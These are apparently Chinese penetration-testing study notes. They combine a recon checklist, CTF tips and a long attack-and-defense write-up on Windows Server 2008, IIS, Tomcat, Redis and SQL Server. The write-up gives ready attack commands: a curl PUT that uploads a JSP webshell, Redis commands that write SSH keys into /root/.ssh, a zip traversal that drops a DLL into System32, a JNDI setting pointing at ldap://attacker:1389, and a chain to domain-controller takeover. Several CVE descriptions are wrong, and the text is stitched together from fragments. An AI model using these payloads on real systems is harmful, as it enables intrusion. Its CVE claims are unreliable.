域名

IP地址

C段

开放端口

运行服务

Web中间件

Web应用

移动应用

网络架构

设备型号

基于Nginx和Lua的高性能Web平台

集成了丰富的Lua库和Nginx模块，支持非阻塞I/O通信，常用于接入网关、Web防火墙等场景

OpenResty通过Lua编程扩展Nginx功能，提供高性能和灵活性

jQuery是一个非常流行的JavaScript库

ASP（Active Server Pages）是一种广泛应用于互联网的服务器端脚本环境

川海

奥远

中远

云南网际科技有限公司

昆明万桦科技有限责任公司

昆明东讯科技有限公司

fofa等

子域名

组织关系

φ（n）=（p-1）*（q-1）

查数据库

?id = 1 and 1=1

?id = 1 and 1=2

修改save_name值为：xx.php/.

修改和增加为：save_name[0]，save_name[2]

PNG：IHDR、IDAT、IEND

找图片上的异常，例如

之后4byte是宽，再之后4byte是高

R0 G0 B0

用010把secert.bin文件的16进制编码复制出来，用cyberchef和‘secert'进行异或

09一般为伪加密

wc

ALT+T

一、Windows Server 2008 深度漏洞解析 1. CVE-2017-0143（永恒之蓝） 漏洞层级：操作系统级远程代码执行 技术原理： SMBv1 协议处理SMB_COM_TRANSACTION2请求时，未正确验证Parameters字段长度，导致栈缓冲区溢出 攻击者构造恶意数据包触发MRxSmb.sys驱动程序中的内存破坏 利用链构建： 发送Negotiate Protocol请求确认 SMBv1 支持 构造TRANS2_FIND_FIRST2请求，设置Parameters长度为 0x1000 覆盖返回地址执行 ROP 链，获取 SYSTEM 权限 防御方案： 部署 EDR 检测MRxSmb.sys异常内存操作 配置防火墙阻断 445 端口外网访问 使用DisableCompression注册表键禁用 SMB 压缩（缓解利用） 2. CVE-2018-8120（NTFS 符号链接漏洞） 漏洞场景：Web 服务目录权限配置错误 攻击路径： 上传包含符号链接的 ZIP 文件 利用ExtractFile函数创建指向C:\Windows\System32的符号链接 写入恶意 DLL 到受保护目录 POC 代码示例： python import zipfile with zipfile.ZipFile('exp.zip', 'w') as zf: zf.write('evil.dll', arcname='..\\..\\..\\Windows\\System32\\evil.dll') 防御策略： 禁用 IIS 的目录遍历功能 使用fsutil behavior set SymlinkEvaluation R2R:1限制符号链接权限 二、IIS 7.5 攻击面扩展 1. CVE-2017-7269（WebDAV 缓冲区溢出） 漏洞触发条件： 启用 WebDAV 模块 使用PUT方法上传文件 利用技术： 构造Content-Type: application/ms-tnef请求头 利用IIS WebDAV ISAPI扩展中的缓冲区溢出执行代码 Metasploit 模块使用： bash use exploit/windows/iis/iis_webdav_scstoragepathfromurl set RHOSTS 192.168.1.100 exploit 修复方案： 删除WebDAVModule和WebDAVAuthoringRules 配置 URL Rewrite 模块拦截PUT/PROPFIND请求 2. 短文件名泄露漏洞（无 CVE） 技术细节： 对http://target.com/backup~1.sql的请求会触发 8.3 短文件名解析 攻击者通过爆破短文件名前缀（如backup~1）枚举敏感文件 检测方法： bash for i in {1..10}; do curl -I http://target.com/backup~${i}.sql | grep 200; done 防御措施： 禁用短文件名生成：fsutil 8dot3name set 0 配置 IIS 返回 404 而非 403 错误 三、Tomcat 7.0.59 攻防对抗 1. CVE-2017-12615（PUT 方法文件上传） 漏洞利用链： 发送PUT /shell.jsp HTTP/1.1请求上传恶意 JSP 构造%00截断绕过文件名检查 访问/shell.jsp执行系统命令 POC 实战： bash curl -X PUT "http://target:8080/shell.jsp%00.jpg" -d '<%=Runtime.getRuntime().exec(request.getParameter("cmd"))%>' 防御增强： 修改conf/web.xml添加： xml <init-param> <param-name>readonly</param-name> <param-value>true</param-value> </init-param> 使用 WAF 检测PUT请求中的 JSP 内容 2. CVE-2015-5346（JNDI 注入） 漏洞原理： Tomcat JNDI 资源链接工厂未验证上下文来源 攻击者通过java:comp/env注入恶意 LDAP 服务器地址 利用步骤： 启动 LDAP 服务器监听 构造jndi.properties文件： properties java.naming.factory.initial=com.sun.jndi.ldap.LdapCtxFactory java.naming.provider.url=ldap://attacker:1389/Exploit 部署包含恶意 JNDI 引用的 Web 应用 修复建议： 升级 Tomcat 至 7.0.68+ 配置ResourceLink的global属性为false 四、Redis 3.2.0 渗透进阶 1. GHSA-vw22-qm3h-49pr（整数溢出） 漏洞机制： 处理ziplist数据结构时，zlPush函数未正确校验节点长度 构造超长字段导致堆缓冲区溢出 利用代码： python import redis r = redis.Redis(host='target', port=6379) r.execute_command('ZADD', 'test', '0', 'a'*0x10000) 防御方案： 限制hash-max-ziplist-value等配置参数 使用ACL限制普通用户修改配置 2. 未授权访问 + SSH 公钥写入 攻击流程： 连接 Redis 服务：redis-cli -h target 写入 SSH 公钥到authorized_keys： redis config set dir /root/.ssh config set dbfilename authorized_keys set 1 "\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQ..." save 使用私钥登录服务器 加固措施： 配置bind 127.0.0.1限制监听地址 启用requirepass认证 禁用config命令或设置白名单 五、SQL Server 2008 权限突破 1. MS15-058（远程代码执行） 漏洞触发点： 执行sp_replwritetovarbin存储过程时，未正确验证参数类型 攻击者通过特制查询触发内存破坏 利用工具： 使用sqlmap执行系统命令： bash sqlmap -u "http://target/sql.aspx" --os-shell 防御方案： 禁用xp_cmdshell扩展存储过程 限制数据库用户权限为db_datareader 2. CVE-2008-0106（路径遍历） 攻击场景： 利用xp_dirtree存储过程遍历系统目录 结合xp_fileexist检测敏感文件 检测语句： sql EXEC master.dbo.xp_dirtree 'c:\windows\system32\', 1, 1 修复方法： 删除xp_dirtree和xp_fileexist权限 配置default trace监控存储过程调用 六、漏洞链组合攻击案例 案例：从 Web 到域控的渗透路径 初始突破： 利用 IIS 7.5 的 CVE-2015-1635 获取 SYSTEM 权限 上传mimikatz窃取域管凭证 横向移动： 使用 Redis 未授权访问写入winlogon注册表键值 触发userinit.exe执行后门程序 权限维持： 通过 SQL Server 2008 的 CVE-2008-0106 创建域管理员账户 利用 Tomcat 的 CVE-2020-1938 读取域控配置文件 防御体系设计： 分层防御： 网络层：部署下一代防火墙阻断 SMB、Redis 等高危端口 主机层：启用 Windows DEP、ASLR 和 EMET 缓解内存攻击 应用层：使用 OWASP ESAPI 过滤输入，实施最小权限原则 监控响应： 部署 ELK Stack 分析 IIS 日志中的异常请求 配置 Wazuh 检测authorized_keys文件的异常写入 补丁管理： 建立离线补丁测试环境 使用 WSUS 强制更新关键系统

前端服务器：采用 Windows Server 2008 R2（已停止支持）。存在永恒之蓝漏洞（MS17-010），可通过 SMB 协议远程执行代码；存在内核权限提升漏洞（CVE-2019-0803），攻击者可从低权限用户提权至系统权限；且系统集成的 IE8 存在大量未修复的 XSS 和远程代码执行漏洞。​ 应用服务器：采用 Windows Server 2008（SP2，已停止维护）。存在 Print Spooler 权限提升漏洞（CVE-2021-34527），可通过恶意打印请求获取系统控制权；同时存在 Windows Search 服务远程代码执行漏洞（MS15-014），风险等级极高。​ 数据库服务器：采用 Windows Server 2008 Enterprise（已停止支持）。存在 LSASS 内存泄露漏洞（CVE-2014-0160 对应 Windows 版本变体），可窃取用户凭证；且系统自带的 PowerShell 2.0 存在脚本注入漏洞，易被用于横向移动。

Web 服务器：采用 IIS 7.5（随 Windows Server 2008 R2 默认集成）。存在远程代码执行漏洞（CVE-2017-7269），通过构造恶意 VIEWSTATE 可执行任意命令；且 FastCGI 模块存在权限绕过漏洞，可越权访问服务器文件。​ 应用服务器中间件：选用 Apache Tomcat 7.0.59（Windows 版本）。存在远程代码执行漏洞（CVE-2017-12615），通过构造恶意 PUT 请求可上传 webshell；且与 Windows 系统交互时，存在服务权限配置不当问题，易被提权。​ 缓存中间件：使用 Redis 3.2.0（Windows 移植版）。存在未授权访问漏洞，攻击者可直接登录数据库执行命令，且因 Windows 文件系统权限设计缺陷，可通过写入启动项实现持久化控制。​ 消息队列中间件：采用 RabbitMQ 3.4.3（Windows 版本）。存在默认账号密码（guest/guest）可远程登录的漏洞，且运行在 Windows 系统下时，因用户权限隔离不足，可通过进程注入横向移动。

关系型数据库：选用 SQL Server 2008 R2（运行于 Windows Server 2008 环境）。存在存储过程提权漏洞（CVE-2012-2136），可通过 xp_cmdshell 执行系统命令；且默认 sa 账号密码强度低，易被暴力破解，结合 Windows 系统漏洞可直接获取服务器控制权。​ 非关系型数据库：使用 MongoDB 2.6.12（Windows 版本）。默认监听在 0.0.0.0 且无认证机制，存在未授权访问漏洞，攻击者可篡改数据库数据，且因 Windows 防火墙配置疏漏，易被外部直接访问。

前端：采用 HTML5、CSS3 结合 Vue.js 1.0 框架。Vue.js 1.0 存在 v-html 指令 XSS 过滤不严格的漏洞，攻击者可注入恶意脚本；且 Windows 环境下 IIS 未启用请求过滤，易导致文件上传漏洞被利用。​ 后端：使用.NET Framework 4.0 开发（适配 Windows Server 2008）。存在反序列化漏洞（CVE-2017-8560），可通过构造恶意序列化数据执行代码；且ASP.NET ViewState 未启用加密，易被篡改导致权限绕过。​ API 接口：采用 RESTful 风格但未实现严格的输入验证，存在 SQL 注入、参数篡改等漏洞；且因 Windows 系统未配置 SSL/TLS 强加密套件，传输数据易被中间人劫持。

用户管理模块：因 SQL Server 和.NET 反序列化漏洞，用户密码数据库可被窃取，账号权限可被越权篡改。​ 商品展示模块：因 IIS 漏洞和前端 XSS，商品页面可植入恶意代码，导致用户浏览器被劫持。​ 订单处理模块：因 MongoDB 未授权访问和 Windows 权限漏洞，订单数据可被批量删除或篡改，引发交易混乱。​ 支付集成模块：未加密传输结合 SQL 注入漏洞，支付凭证可被窃取，导致资金损失。​ 物流跟踪模块：因 API 接口漏洞和 Windows Server 远程代码执行漏洞，物流系统可被入侵，导致配送信息被恶意修改。